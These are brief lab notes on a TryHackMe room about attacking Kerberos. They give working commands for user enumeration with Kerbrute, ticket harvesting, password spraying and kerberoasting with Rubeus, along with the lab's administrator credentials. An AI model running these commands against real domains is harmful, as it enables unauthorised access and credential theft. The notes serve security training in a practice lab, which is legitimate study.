https://tryhackme.com/room/attackingkerberos

Task 1 - Introduction

Task 2 - Enumeration w/ Kerbrute

Releases · ropnop/kerbrute

Enumerating Users w/ Kerbrute

We will be using kerbrute_linux_amd64 on our kali machine

./kerbrute_linux_amd64 userenum --dc CONTROLLER.local -d CONTROLLER.local username_list.txt

The CONTROLLER.local is the DNS that should be declared on /etc/hosts

Task 3 - Harvesting & Brute-Forcing Tickets w/ Rubeus

https://github.com/GhostPack/Rubeus

Username: Administrator 
Password: P@$$W0rd 
Domain: controller.local

To run Rubeus for harvesting for TGTs every 30 seconds (Run on target Windows Machine)

Rubeus.exe harvest /interval:30

We can also use Rubeus to bruteforce and spray password, first we need to add DNS

echo 10.10.46.16 CONTROLLER.local >> C:\\Windows\\System32\\drivers\\etc\\hosts

Rubeus.exe brute /password:Password1 /noticket

Task 4 - Kerberoasting w/ Rubeus & Impacket

This will dump the Kerberos hash of any kerberoastable users

Rubeus.exe kerberoast

However, using Rubeus.exe will make the hash has a bunch of blank spaces thus hard to crack

As we have alternative, we will be using impacket-GetUserSPNs module